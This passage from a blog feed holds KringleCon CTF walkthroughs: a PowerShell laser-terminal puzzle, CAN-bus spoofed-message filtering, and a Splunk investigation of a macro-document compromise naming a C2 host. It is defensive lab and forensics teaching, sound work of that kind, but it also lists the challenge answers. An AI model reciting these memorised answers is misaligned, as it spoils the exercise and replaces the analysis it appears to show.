Directory: /home/elf/expanded/refraction
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 11/7/19 11:57 AM &lt;span class="m">134&lt;/span> riddle &lt;span class="s">&amp;lt;&amp;lt; further clue f&lt;/span>or temperature
------ 11/5/19 2:26 PM &lt;span class="m">5724384&lt;/span> runme.elf &lt;span class="s">&amp;lt;&amp;lt; refraction is hidden here&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This archive, when unpacked, revealed a folder named &lt;strong>refraction&lt;/strong> containing another hint plus the value for refraction. To get the refraction value I had to somehow run the file &lt;strong>runme.elf&lt;/strong>. I spent close to 2 hours trying to figure out how to call this file from PowerShell; when I had almost given up, I gave it a final try by issuing &lt;code>chmod +x&lt;/code> and then running it as a binary executable. Quite surprisingly, this worked like a charm:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf/expanded/refraction&amp;gt; chmod +x ./runme.elf
PS /home/elf/expanded/refraction&amp;gt; ./runme.elf
refraction?val&lt;span class="o">=&lt;/span>1.867
PS /home/elf/expanded/refraction&amp;gt; Get-Content ./riddle
Very shallow am I in the depths of your elf home. You can find my entity by using my md5 identity:
25520151A320B5B0D21561F92C8F6224
PS /home/elf/expanded/refraction&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So there was the correct setting for the &lt;strong>refraction&lt;/strong> of the laser. Next I turned to the other file in the folder, called &lt;strong>riddle&lt;/strong>, and saw further clues. I noticed that it referred to &lt;strong>depths&lt;/strong>, a reference to the HOME directory, which contained hundreds of text files spread over several levels of folder hierarchy. Somewhere in these depths was a file whose MD5 hash matched the one in the riddle. To find it I issued the below command:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem ./depths/*.txt -Recurse &lt;span class="p">|&lt;/span> Get-FileHash -Algorithm MD5 &lt;span class="p">|&lt;/span> Where-Object &lt;span class="nb">hash&lt;/span> -eq 25520151A320B5B0D21561F92C8F6224 &lt;span class="p">|&lt;/span> Select path
Path
----
/home/elf/depths/produce/thhy5hll.txt
PS /home/elf&amp;gt; Get-Content /home/elf/depths/produce/thhy5hll.txt
temperature?val&lt;span class="o">=&lt;/span>-33.5
I am one of many thousand similar txt&lt;span class="s1">&amp;#39;s contained within the deepest of /home/elf/depths. Finding me will give you the most strength but doing so will require Piping all the FullName&amp;#39;&lt;/span>s to Sort Length.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The last missing piece of the laser puzzle was the correct composition of &lt;strong>gas&lt;/strong> compounds for the laser. There were no direct hints that I could find; however, I had the idea that the &lt;code>/home/elf/depths&lt;/code> folder might be holding more than just the &lt;strong>temperature&lt;/strong>. So I searched for the top 3 largest text files within this folder and found that the 2 largest were somewhat special. The largest was the one which contained the temperature; the second largest was another file with some further clues.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Path ./depths/ -Recurse &lt;span class="p">|&lt;/span> Sort-Object Length -Descending &lt;span class="p">|&lt;/span> Select-Object length,name,directory -First &lt;span class="m">3&lt;/span> &lt;span class="p">|&lt;/span> Format-Table -AutoSize -Wrap
Length Name Directory
------ ---- ---------
&lt;span class="m">224&lt;/span> thhy5hll.txt /home/elf/depths/produce
&lt;span class="m">209&lt;/span> 0jhj5xz6.txt /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/u
nknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/t
ape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/bea
uty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main
/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/la
bor/sail/dropped/fox
&lt;span class="m">162&lt;/span> r9j67n1j.txt /home/elf/depths/larger/saddle/grown/correctly/allow/free/spoken/coffee
/sight/increase/steady/division/gas/available/pressure/wooden
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As can be seen, the 3rd largest file was noticeably smaller. I still checked its content, but there was nothing useful in it, so it was safe to assume that no other files within the depths folder were of any interest. I then checked the contents of the &lt;code>0jhj5xz6.txt&lt;/code> buried deep within the &lt;code>depths&lt;/code> and found that it contained a pretty useful hint:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-Content /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escape/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/therefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either/burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/greatest/become/accident/labor/sail/dropped/fox/0jhj5xz6.txt
Get process information to include Username identification. Stop Process to show me you&lt;span class="s1">&amp;#39;re skilled and in this order they must be killed:
&lt;/span>&lt;span class="s1"> bushy
&lt;/span>&lt;span class="s1"> alabaster
&lt;/span>&lt;span class="s1"> minty
&lt;/span>&lt;span class="s1"> holly
&lt;/span>&lt;span class="s1">Do this for me and then you /shall/see.
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Get-Process -IncludeUserName
&lt;/span>&lt;span class="s1"> WS(M) CPU(s) Id UserName ProcessName
&lt;/span>&lt;span class="s1"> ----- ------ -- -------- -----------
&lt;/span>&lt;span class="s1"> 28.99 2.01 6 root CheerLaserServi
&lt;/span>&lt;span class="s1"> 191.95 16.86 31 elf elf
&lt;/span>&lt;span class="s1"> 3.57 0.02 1 root init
&lt;/span>&lt;span class="s1"> 0.72 0.00 24 bushy sleep
&lt;/span>&lt;span class="s1"> 0.75 0.00 26 alabaster sleep
&lt;/span>&lt;span class="s1"> 0.77 0.00 28 minty sleep
&lt;/span>&lt;span class="s1"> 0.82 0.00 29 holly sleep
&lt;/span>&lt;span class="s1"> 3.27 0.00 30 root su
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Stop-Process 24 26 28 29
&lt;/span>&lt;span class="s1">PS /home/elf&amp;gt; Get-Content /shall/see
&lt;/span>&lt;span class="s1">Get the .xml children of /etc - an event log to be found. Group all .Id&amp;#39;&lt;/span>s and the last thing will be in the Properties of the lonely unique event Id.
PS /home/elf&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So it seemed the gas values were hidden somewhere in an &lt;code>.xml&lt;/code> file in the &lt;code>/etc&lt;/code> folder. To find this file I turned to another PowerShell command:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-ChildItem -Recurse -Include *.xml -Path /etc/
Directory: /etc/systemd/system/timers.target.wants
Mode LastWriteTime Length Name
---- ------------- ------ ----
--r--- 11/18/19 7:53 PM &lt;span class="m">10006962&lt;/span> EventLog.xml
&lt;/code>&lt;/pre>&lt;/div>&lt;p>It was a rather large XML file, so instead of displaying it, I went for a simple text-based search. I know the hint said I should parse the XML and do some fancy grouping by event Id, but I am fond of simpler shortcuts whenever possible, and a plain string search quickly gave me the answer to the composition of gases:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">PS /home/elf&amp;gt; Get-Content /etc/systemd/system/timers.target.wants/EventLog.xml &lt;span class="p">|&lt;/span> Select-String -pattern &lt;span class="s2">&amp;#34;gas&amp;#34;&lt;/span>
&amp;lt;S &lt;span class="nv">N&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;Message&amp;#34;&lt;/span>&amp;gt;
Process Create: -
RuleName: -
UtcTime: 2019-11-07 17:59:56.525
ProcessGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-5B9C-5DC4-0000-00107660A900&lt;span class="o">}&lt;/span>
ProcessId: &lt;span class="m">3664&lt;/span>
Image: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\W&lt;/span>indowsPowerShell&lt;span class="se">\v&lt;/span>1.0&lt;span class="se">\p&lt;/span>owershell.exe
FileVersion: 10.0.14393.206 &lt;span class="o">(&lt;/span>rs1_release.160915-0644&lt;span class="o">)&lt;/span>
Description: Windows PowerShell Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\W&lt;/span>indowsPowerShell&lt;span class="se">\v&lt;/span>1.0&lt;span class="se">\p&lt;/span>owershell.exe -c &lt;span class="s2">&amp;#34;`&lt;/span>&lt;span class="nv">$correct_gases_postbody&lt;/span>&lt;span class="s2"> = @{`n O=6`n H=7`n He=3`n N=4`n Ne=22`n Ar=11`n Xe=10`n F=20`n Kr=8`n Rn=9`n}`n&amp;#34;&lt;/span>
CurrentDirectory: C:&lt;span class="se">\
&lt;/span>&lt;span class="se">&lt;/span> User: ELFURESEARCH&lt;span class="se">\a&lt;/span>llservices
LogonGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-5B9C-5DC4-0000-0020F55CA900&lt;span class="o">}&lt;/span>
LogonId: 0xA95CF5
TerminalSessionId: &lt;span class="m">0&lt;/span>
IntegrityLevel: High
Hashes: &lt;span class="nv">MD5&lt;/span>&lt;span class="o">=&lt;/span>097CE5761C89434367598B34FE32893B
ParentProcessGuid: &lt;span class="o">{&lt;/span>BA5C6BBB-4C79-5DC4-0000-001029350100&lt;span class="o">}&lt;/span>
ParentProcessId: &lt;span class="m">1008&lt;/span>
ParentImage: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\S&lt;/span>ystem32&lt;span class="se">\s&lt;/span>vchost.exe
ParentCommandLine: C:&lt;span class="se">\W&lt;/span>indows&lt;span class="se">\s&lt;/span>ystem32&lt;span class="se">\s&lt;/span>vchost.exe -k netsvcs&amp;lt;/S&amp;gt;
&lt;/code>&lt;/pre>&lt;/div>&lt;p>I formatted the output a bit, but it is easy to spot the composition of gases within the arguments of the PowerShell executable: &lt;code>O=6 H=7 He=3 N=4 Ne=22 Ar=11 Xe=10 F=20 Kr=8 Rn=9&lt;/code>. With this final piece of the puzzle in place, I used the laser Web API to submit the correct values and reached 5 Mega-Jollies per liter of laser output.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/off&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/angle?val&lt;span class="o">=&lt;/span>65.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val&lt;span class="o">=&lt;/span>-33.5&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val&lt;span class="o">=&lt;/span>1.867&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest -Uri http://127.0.0.1:1225/api/gases -Body &lt;span class="s2">&amp;#34;O=6&amp;amp;H=7&amp;amp;He=3&amp;amp;N=4&amp;amp;Ne=22&amp;amp;Ar=11&amp;amp;Xe=10&amp;amp;F=20&amp;amp;Kr=8&amp;amp;Rn=9&amp;#34;&lt;/span> -Method POST&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/on&lt;span class="o">)&lt;/span>.RawContent
&lt;span class="o">(&lt;/span>Invoke-WebRequest http://127.0.0.1:1225/api/output&lt;span class="o">)&lt;/span>.RawContent
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now that this terminal issue is solved, let&amp;rsquo;s check with Sparkle Redberry for the hints he promised:&lt;/p>
&lt;blockquote>
&lt;p>You got it - three cheers for cheer!
For objective 5, have you taken a look at our Zeek logs?
Something&amp;rsquo;s gone wrong. But I hear someone named Rita can help us.
Can you and she figure out what happened?&lt;/p>
&lt;/blockquote>
&lt;h2 id="main-objective">Main Objective&lt;/h2>
&lt;p>So the hint from Sparkle mentioned Rita, which is not a reference to some other character on the ELFU campus, but a
&lt;a href="https://www.activecountermeasures.com/free-tools/rita/" target="_blank" rel="noopener">tool&lt;/a> for solving the main objective. The tool is available through a GitHub
&lt;a href="https://github.com/activecm/rita" target="_blank" rel="noopener">repository&lt;/a>.&lt;/p>
&lt;p>As a next step I unpacked the 300 MB zip and noticed that it already contained a folder &lt;strong>ELFU&lt;/strong> which had an &lt;strong>index.html&lt;/strong>. I loaded it up in my browser and noticed that it contained statistics from presumably the same log files, so I did not have to install RITA after all. Instead I relied on the contents of this ELFU folder from the unpacked zip.&lt;/p>
&lt;p>So next I opened the index.html and saw that one database named &lt;strong>ELFU&lt;/strong> was available. I clicked it and got a bunch of tabs with different kinds of information:&lt;/p>
&lt;p>&lt;img src="../images/obj5-rita.png" alt="Rita Web UI">&lt;/p>
&lt;p>I first noticed the &lt;strong>Beacons&lt;/strong> tab, where the very first item in the table had 7660 connections and a source IP of &lt;strong>192.168.134.130&lt;/strong>. I remembered that I was looking for the IP address of a system infected with malware, so I also checked the &lt;strong>Long Connections&lt;/strong> tab, where the same source IP showed up with the longest connection of 1000 (probably seconds?). I tried my luck with this IP address as the answer and the value was accepted!&lt;/p></description></item><item><title>Sleigh CAN-D-BUS Issue</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/objective7/</link><pubDate>Thu, 24 Dec 2020 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/objective7/</guid><description>&lt;p>&lt;img src="../images/obj7/objective7.png" alt="Objective7">&lt;/p>
&lt;p>Now that Splunk is solved, my badge tells me to head up to the &lt;code>NetWars&lt;/code> room to solve the next objective and talk with &lt;code>Wunorse Openslae&lt;/code>, who can help if I figure out what&amp;rsquo;s up with his terminal:&lt;/p>
&lt;blockquote>
&lt;p>Hey Santa!
Those tweaks you made to the sled just don’t seem right to me.
I can’t figure out what’s wrong, but maybe you can check it out to fix it.&lt;/p>
&lt;/blockquote>
&lt;p>Next I click on the terminal next to him, which pops up a CLI session. As the MOTD tells me, there is a file with logs of the sleigh&amp;rsquo;s CAN traffic. In the logs there are a few distinct message types:&lt;/p>
&lt;ul>
&lt;li>Engine &lt;code>UP/DOWN&lt;/code> messages (many of these)&lt;/li>
&lt;li>&lt;code>LOCK&lt;/code> and &lt;code>UNLOCK&lt;/code> messages (3 in total!)&lt;/li>
&lt;/ul>
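&lt;p>Each line of &lt;code>candump.log&lt;/code> has the form &lt;code>(timestamp) interface ID#PAYLOAD&lt;/code>, so the message ID and data bytes can be separated with plain shell parameter expansion. A quick sketch, using a sample entry from the log:&lt;/p>

```shell
# Sample entry from candump.log
line='(1608926664.626448) vcan0 19B#000000000000'
set -- $line                 # split on whitespace: $1=timestamp $2=interface $3=frame
frame=$3
id=${frame%%#*}              # message ID before the '#'
payload=${frame#*#}          # data bytes after the '#'
echo "$id $payload"          # prints: 19B 000000000000
```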
&lt;p>So then I inspect the &lt;code>candump.log&lt;/code> file and do some transformations on it. First, I keep only the third column of each line. Then I extract the first 3 characters and use &lt;code>sort -nr&lt;/code> &amp;amp; &lt;code>uniq -c&lt;/code> to count how many messages of each ID are present in the logs:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>elf@87cee25c674e:~$ cat candump.log &lt;span class="p">|&lt;/span> awk &lt;span class="s1">&amp;#39;{print $3}&amp;#39;&lt;/span> &lt;span class="p">|&lt;/span> cut -b 1-3 &lt;span class="p">|&lt;/span> sort -nr &lt;span class="p">|&lt;/span> uniq -c
&lt;span class="ln">2&lt;/span> &lt;span class="m">1331&lt;/span> &lt;span class="m">244&lt;/span>
&lt;span class="ln">3&lt;/span> &lt;span class="m">35&lt;/span> &lt;span class="m">188&lt;/span>
&lt;span class="hl">&lt;span class="ln">4&lt;/span> &lt;span class="m">3&lt;/span> 19B
&lt;/span>&lt;span class="ln">5&lt;/span>
&lt;span class="ln">6&lt;/span>elf@87cee25c674e:~$ cat candump.log &lt;span class="p">|&lt;/span> grep 19B#
&lt;span class="ln">7&lt;/span>&lt;span class="o">(&lt;/span>1608926664.626448&lt;span class="o">)&lt;/span> vcan0 19B#000000000000
&lt;span class="hl">&lt;span class="ln">8&lt;/span>&lt;span class="o">(&lt;/span>1608926671.122520&lt;span class="o">)&lt;/span> vcan0 19B#00000F000000
&lt;/span>&lt;span class="ln">9&lt;/span>&lt;span class="o">(&lt;/span>1608926674.092148&lt;span class="o">)&lt;/span> vcan0 19B#000000000000
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This shows that messages with ID &lt;code>19B&lt;/code> are related to &lt;code>LOCK/UNLOCK&lt;/code> events, which will be useful for fixing Santa&amp;rsquo;s sleigh next:&lt;/p>
&lt;p>&lt;img src="../images/obj7/run-to-answer-can-bus.png" alt="RunToAnswer CAN BUS">&lt;/p>
&lt;p>Next I click on Santa&amp;rsquo;s sleigh, and a strange control interface pops up. To learn more about it, I watch the KringleCon talk from &lt;strong>Chris Elgee&lt;/strong> on the CAN bus in vehicles
&lt;a href="https://www.youtube.com/watch?v=96u-uHRBI0I" target="_blank" rel="noopener">HERE&lt;/a>.&lt;/p>
&lt;p>&lt;img src="../images/obj7/sleigh-can-bus.png" alt="Sleigh CAN-D-BUS">&lt;/p>
&lt;p>Initially, I just naively excluded all messages with ID &lt;code>19B&lt;/code>, but that did not seem to fix it. Then I excluded some of the most common messages to slow the stream down a bit so that I could see more clearly what was happening. That&amp;rsquo;s when I discovered a strange message with the same ID but a non-zero payload in the stream:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="m">1609081466157&lt;/span> 019#00000000
&lt;span class="ln">2&lt;/span>&lt;span class="m">1609081466258&lt;/span> 188#00000000
&lt;span class="hl">&lt;span class="ln">3&lt;/span>&lt;span class="m">1609081466462&lt;/span> 19B#0000000F2057 &lt;span class="s">&amp;lt;&amp;lt; THIS SHOULD NOT&lt;/span> BE HERE!
&lt;/span>&lt;span class="ln">4&lt;/span>&lt;span class="m">1609081466562&lt;/span> 080#000000
&lt;span class="ln">5&lt;/span>&lt;span class="m">1609081466663&lt;/span> 019#00000000
&lt;span class="ln">6&lt;/span>&lt;span class="m">1609081466767&lt;/span> 188#00000000
&lt;/code>&lt;/pre>&lt;/div>&lt;p>I thought this may be the malicious message that is being inserted onto the bus, so I excluded it. This was probably a step in the right direction, but it was still not enough to complete the objective.&lt;/p>
&lt;p>Next, I proceeded to play a bit with the controls and noticed something strange when the brake slider was moved. On each cycle, two messages would be emitted from the brake:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>&lt;span class="m">1609082448556&lt;/span> 080#000028
&lt;span class="hl">&lt;span class="ln">2&lt;/span>&lt;span class="m">1609082448576&lt;/span> 080#FFFFF0 &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> EXCLUDE!
&lt;/span>&lt;span class="ln">3&lt;/span>&lt;span class="m">1609082449074&lt;/span> 080#000028
&lt;span class="hl">&lt;span class="ln">4&lt;/span>&lt;span class="m">1609082449077&lt;/span> 080#FFFFF3 &lt;span class="o">&amp;lt;&amp;lt;&amp;lt;&lt;/span> EXCLUDE!
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The ones with high payload values seemed suspicious, so I excluded them all and voila, this was the correct solution!&lt;/p>
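&lt;p>One possible reading of why these payloads stand out (my own interpretation, not something the challenge confirms): decoded as 24-bit two&amp;rsquo;s-complement values, the injected frames are negative numbers while the legitimate brake messages are small positive positions:&lt;/p>

```shell
# Interpret a 6-hex-digit CAN payload as a signed 24-bit integer (two's complement)
to_signed24() {
  v=$((0x$1))
  if [ "$v" -ge $((0x800000)) ]; then
    v=$((v - 0x1000000))
  fi
  echo "$v"
}
to_signed24 000028   # prints 40  (plausible brake position)
to_signed24 FFFFF0   # prints -16 (suspicious negative value)
```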
&lt;p>&lt;img src="../images/obj7/can-d-bus-solved.png" alt="CAN D BUS Solved">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p></description></item><item><title>Splunk</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective6/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective6/</guid><description>&lt;h2 id="evil-emails">Evil emails!&lt;/h2>
&lt;p>Instructions from the badge:&lt;/p>
&lt;blockquote>
&lt;p>Access &lt;a href="https://splunk.elfu.org/">https://splunk.elfu.org/&lt;/a> as elf with password elfsocks.
What was the message for Kent that the adversary embedded in this attack?
The SOC folks at that link will help you along!
For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.&lt;/p>
&lt;/blockquote>
&lt;p>For additional advice you are told to visit Hermey Hall and talk to Prof Banas:&lt;/p>
&lt;p>&lt;img src="../images/obj6-banas.png" alt="Prof Banas">&lt;/p>
&lt;blockquote>
&lt;p>Hi, I&amp;rsquo;m Dr. Banas, professor of Cheerology at Elf University.
This term, I&amp;rsquo;m teaching &amp;ldquo;HOL 404: The Search for Holiday Cheer in Popular Culture,&amp;rdquo; and I&amp;rsquo;ve had quite a shock!
I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC.
Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP!
If I don&amp;rsquo;t, he will have to report the incident to the boss of the SOC.
Apparently, I can find out more information from this website &lt;a href="https://splunk.elfu.org/">https://splunk.elfu.org/&lt;/a> with the username: elf / Password: elfsocks.
I don&amp;rsquo;t know anything about computer security. Can you please help me?&lt;/p>
&lt;/blockquote>
&lt;p>This time there was no terminal which needed to be fixed through some command-line magic; instead, you just had to browse to the URL given by Prof. Banas and follow the hints through the ElfU SOC chat interface. When you first visit, you will be greeted with the below message.&lt;/p>
&lt;p>&lt;img src="../images/obj6-splunk.png" alt="Splunk Interface">&lt;/p>
&lt;p>The main question to answer:&lt;/p>
&lt;p>&lt;code>What was the message for Kent that the adversary embedded in this attack?&lt;/code>&lt;/p>
&lt;p>To get to the answer, you should rely on the training questions and the hints from the SOC characters in the chat. Alice in the chat will tell you that you don&amp;rsquo;t necessarily need to solve all the training questions; if you already know Splunk, you can safely skip them and look for the answer to the main question. To do this you will need these 2 resources:&lt;/p>
&lt;ul>
&lt;li>ElfU Splunk Search: &lt;a href="https://splunk.elfu.org/en-GB/app/SA-elfusoc/search">https://splunk.elfu.org/en-GB/app/SA-elfusoc/search&lt;/a>&lt;/li>
&lt;li>ElfU File Archive: &lt;a href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/">http://elfu-soc.s3-website-us-east-1.amazonaws.com/&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>Since I never used Splunk before, I went through the training questions anyway to learn the logic of Splunk:&lt;/p>
&lt;h4 id="q1---what-is-the-short-host-name-of-professor-banas-computer">Q1 - What is the short host name of Professor Banas&amp;rsquo; computer?&lt;/h4>
&lt;p>This can be answered by simply paying attention to the discussion in the chat windows. If you missed it go back to the group chat called &lt;strong>Chat with #ELFU SOC&lt;/strong> and read it again. Then you will see that the answer is &lt;strong>sweetums&lt;/strong>.&lt;/p>
&lt;h4 id="q2---what-is-the-fully-path-and-name-of-the-sensitive-file-that-was-likely-accessed-and-copied-by-the-attacker">Q2 - What is the fully path and name of the sensitive file that was likely accessed and copied by the attacker?&lt;/h4>
&lt;p>For this question, Alice mentioned that Prof. Banas is really close with Santa, and that they worry that the attacker who compromised the Prof&amp;rsquo;s machine may have accessed some sensitive information related to Santa. Her tip is to do a simple text search for something you are interested in, which she says can lead straight to the answer quite often. So when you search the data for any mention of &lt;strong>santa&lt;/strong> you will get a few hits, the answer can be found within the below text:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-xml" data-lang="xml">ParameterBinding(Format-List):
name=&amp;#34;InputObject&amp;#34;;
value=&amp;#34;C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt:1:Carl, you know there&amp;#39;s no one I trust more than you to help. Can you have a look at this draft Naughty and Nice list for 2019 and let me know your thoughts? -Santa&amp;#34;
&lt;/code>&lt;/pre>&lt;/div>&lt;h4 id="q3---what-is-the-fully-qualified-domain-namefqdn-of-the-command-and-controlc2-server">Q3 - What is the fully-qualified domain name(FQDN) of the command and control(C2) server?&lt;/h4>
&lt;p>Since these questions are meant to be for training, Alice will almost give you the correct search term straight away. In one of her messages she posted a link to a Splunk search that she did with the below parameters:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="nv">index&lt;/span>&lt;span class="o">=&lt;/span>main &lt;span class="nv">sourcetype&lt;/span>&lt;span class="o">=&lt;/span>XmlWinEventLog:Microsoft-Windows-Sysmon/Operational powershell &lt;span class="nv">EventCode&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="m">3&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This Splunk search gave away the answer in the first search result. The C&amp;amp;C server&amp;rsquo;s FQDN is: &lt;strong>144.202.46.214.vultr.com&lt;/strong>.&lt;/p>
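&lt;p>As a side note, this generated hostname embeds the server&amp;rsquo;s IPv4 address directly, so the raw C&amp;amp;C IP can be recovered from the FQDN with a quick regex:&lt;/p>

```shell
# The C&C FQDN starts with the dotted-quad address; extract it with grep
echo '144.202.46.214.vultr.com' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'
# prints 144.202.46.214
```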
&lt;h4 id="q4---what-document-is-involved-with-launching-the-malicious-powershell-code-provide-just-file-name">Q4 - What document is involved with launching the malicious PowerShell code (provide just file name)?&lt;/h4>
&lt;p>For this question Alice showed a neat technique which can help filter the pool of event logs by setting a time-window of +/- 5 seconds of some interesting event at a particular point in time. Eventually she points out that you are looking for a document, so why not search for the string &lt;strong>doc&lt;/strong> and see what comes up:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">19th Century Holiday Cheer Assignment.doc
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This seemed promising, however it was not accepted as the answer. Then I remembered that Word documents have different extensions such as &lt;strong>.docx&lt;/strong>, &lt;strong>.docm&lt;/strong> and so on, so I did a Google search for PowerShell execution from Word and realized that this requires Word macros to be enabled, which means the file should have the &lt;strong>.docm&lt;/strong> extension. Next I tried the same search but for &lt;strong>docm&lt;/strong>, and this time the same filename popped up with the .docm extension, which was the correct answer: &lt;strong>19th Century Holiday Cheer Assignment.docm&lt;/strong>.&lt;/p>
&lt;h4 id="q5---how-many-unique-email-addresses-were-used-to-send-holiday-cheer-essays-to-professor-banas">Q5 - How many unique email addresses were used to send Holiday Cheer essays to Professor Banas?&lt;/h4>
&lt;p>To answer this one, Alice gave some useful info on
&lt;a href="https://stoq.punchcyber.com/" target="_blank" rel="noopener">StoQ&lt;/a> and a starting query as well. If you modify the query a bit to show less info, you can easily count the emails manually:&lt;/p>
&lt;p>&lt;code>index=main sourcetype=stoq | table _time results{}.workers.smtp.to results{}.workers.smtp.subject | sort - _time&lt;/code>&lt;/p>
&lt;p>Just sort the table based on the subject line and count how many rows there are for the subject &lt;strong>Holiday Cheer Assignment Submission&lt;/strong>. In total you should get &lt;strong>21&lt;/strong>, which is the correct answer.&lt;/p>
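&lt;p>Counting by hand works here, but it does not scale. Once the address column is exported from Splunk (the file name below is hypothetical), the shell can deduplicate and count in one pipeline:&lt;/p>

```shell
# Hypothetical export of the sender column, one address per line
cat > senders.txt <<'EOF'
student1@elfu.org
student2@elfu.org
student1@elfu.org
student3@elfu.org
EOF
# Deduplicate, then count the remaining lines
sort -u senders.txt | wc -l   # prints the number of unique addresses: 3
```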
&lt;h4 id="q6---what-was-the-password-for-the-zip-archive-that-contained-the-suspicious-file">Q6 - What was the password for the zip archive that contained the suspicious file?&lt;/h4>
&lt;p>This one you can solve very easily without many hints if you took the time to read some of the emails that the professor received from his students as part of their course submissions. The ZIP that contained the malicious Word document was locked with the password &lt;strong>123456789&lt;/strong>, which was mentioned in the email as well. Not very strong, nor secure&amp;hellip;&lt;/p>
&lt;h4 id="q7---what-email-address-did-the-suspicious-file-come-from">Q7 - What email address did the suspicious file come from?&lt;/h4>
&lt;p>This question was answered easily if you inspected any of the emails from the previous question. The sender was &lt;strong>&lt;a href="mailto:bradly.buttercups@eifu.org">bradly.buttercups@eifu.org&lt;/a>&lt;/strong>.&lt;/p>
&lt;h2 id="main-question">Main Question&lt;/h2>
&lt;p>Finally, to answer the main question of Objective 6, return to Alice for some additional hints. For obvious reasons the malicious document is not available for you to inspect, but the File Archive she mentioned earlier is a good place to look if you know what to look for. She also pointed out that it contains metadata from &lt;strong>StoQ&lt;/strong>, and also provided a search term:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">&lt;span class="nv">index&lt;/span>&lt;span class="o">=&lt;/span>main &lt;span class="nv">sourcetype&lt;/span>&lt;span class="o">=&lt;/span>stoq &lt;span class="s2">&amp;#34;results{}.workers.smtp.from&amp;#34;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;bradly buttercups &amp;lt;bradly.buttercups@eifu.org&amp;gt;&amp;#34;&lt;/span>
